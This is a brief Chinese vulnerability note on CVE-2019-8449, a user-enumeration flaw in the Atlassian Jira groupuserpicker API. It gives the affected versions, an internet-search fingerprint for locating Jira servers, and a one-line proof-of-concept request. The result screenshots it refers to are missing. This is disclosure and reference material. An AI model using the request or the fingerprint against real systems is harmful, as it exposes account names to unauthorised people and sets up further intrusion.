Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449

漏洞描述

Atlassian Jira groupuserpicker接口存在用户信息枚举漏洞，攻击者通过漏洞可以获取应用中的使用者账户名称，来进行进一步渗透

漏洞影响

Atlassian Jira <8.4.0

网络测绘

app="ATLASSIAN-JIRA"

漏洞复现

登录页面

验证POC

/rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false

当用户存在时

当用户不存在时